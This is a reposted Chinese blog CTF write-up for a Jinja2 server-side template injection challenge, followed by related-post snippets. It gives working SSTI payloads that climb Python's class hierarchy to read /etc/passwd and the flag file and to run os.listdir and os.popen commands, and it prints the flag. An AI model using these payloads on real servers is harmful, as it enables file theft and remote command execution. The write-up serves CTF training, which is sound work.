web python template injection_攻防世界-Web_python_template_injection详解

最新推荐文章于 2023-07-29 15:05:54 发布
最新推荐文章于 2023-07-29 15:05:54 发布
阅读量419 收藏
点赞数
文章标签: web python template injection

Web_python_template_injection

在做这道题之前如果大家不懂可以先看一看这篇文章:

从零学习flask模板注入

基础知识:

在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

1.判断有无模板注入

payload

http://220.249.52.133:53362/{{7+7}}

查看全局变量

http://220.249.52.133:53362/{{config}}

基础知识:

文件包含:是通过python的对象的继承来一步步实现文件读取和命令执行的的。

思路:找到父类–>寻找子类–>找关于命令执行或者文件操作的模块。

几个魔术方法

__class__ 返回类型所属的对象

__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的

__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__ 类的初始化方法

__globals__ 对包含函数全局变量的字典的引用

寻找可用引用

payload:

{{''.__class__.__mro__[2].__subclasses__()}}

可以看到有一个type file类型(可以进行文件读取)

{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

[40]是tupe file类型出现位置(从0开始的位置)

可以看到有一个 类型(可以进行命令执行)

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

本题我们主要用到命令执行,直接利用上面的payload即可

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

[71]为出现位置

读取flag

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

flag:

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

原文链接:https://blog.csdn.net/Mr_helloword/article/details/107949217

weixin_39989668
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1138
好难啊
opencv_python-4.5.5.62-cp36-abi3-win_amd64.whl
01-06
opencv_python-4.5.5.62-cp36-abi3-win_amd64.whl 适用关于64位Windows系统
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1640
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
【愚公系列】2023年05月 攻防世界-WebWeb_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
Web安全(Web_python_template_injection
m0_56010012的博客
03-01 1595
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1339
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py
09-21
标题中的“cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py”暗示了这是一个关于使用Python的Selenium WebDriver库来操作Web页面的教程或代码示例。描述中的“python webdriver登录web页面”...
Python库 | template_python_projects-1.5.tar.gz
03-11
本资源“template_python_projects-1.5.tar.gz”是一个包含Python项目的模板压缩包,旨在为开发者提供一个起点,帮助他们快速启动新项目。这个压缩包可能包含了各种结构化的项目模板,适用于不同的Python开发场景。 ...
Python库 | py_injection_manager-0.4.tar.gz
03-09
Python库py_injection_manager-0.4:深入解析与应用》 在Python世界里,库扮演着至关重要的角色,它们极大地丰富了Python的功能并提高了开发效率。本文将聚焦于一个名为`py_injection_manager-0.4`的Python库,...
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 1972
考点为模板漏洞及其利用。
WEB:Web_python_template_injection
最新发布
sleepywin的博客
07-29 234
可以看到当前目录下有个fl4g,执行cat fl4g。打开题目,发现页面提示,翻译为python模板注入。利用site.Printer的os模块执行命令。python模板注入。
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6877
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3333
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 557
有关python模板注入漏洞的学习
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 273
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
攻防世界Web_python_template_injection
weixin_52268949的博客
02-08 881
Web_python_template_injection 根据题目意思有点像python的ssti模板注入 我们来测试一下 果真存在那么我们就用ssti的基本方法了 我们先来看看全局变量 我们先来寻找一下基类 http://111.200.241.244:62377/{{''.__class__.__mro__}} 在这里发现了object类 寻找<type ‘object’>类的所有子类中可用的引用类 http://111.200.241.244:62377/{{''.__cla
Flask入门系列(三)–模板
ASP.NET
11-03 244
在第一篇中,我们讲到了Flask中的Controller和Model,但是一个完整的MVC,没有View怎么行?前端代码如果都靠后台拼接而成,就太麻烦了。本篇,我们就介绍下Flask中的View,即模板。 系列文章 Flask入门系列(一)-Hello World Flask入门系列(二)-路由 Flask入门系列(三)-模板 Flask入门系列(四)-请求,响应及会话 Flask入门...
攻防世界 Web_python_template_injection
feng的博客
09-03 543
前言 这是一道关于python的flask模板注入的题目,刚碰到这个题目的时候我对于flask和模板注入是没有接触过的,因此上网查找相关知识并结合攻防世界给出的WP做出了这个题目。 做题前知识点的了解 https://xz.aliyun.com/t/3679 这篇博客对于我这样的萌新来说非常友好,对于flask的ssti模板注入讲解的很好,推荐一看。看完这个,就对flask的模板注入有了一个大致的了解,但是对于如何应用可能有些迷茫,下面结合攻防世界的这个题目来更加深入的了解。 WP 作为一个萌新,刚打开这个

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值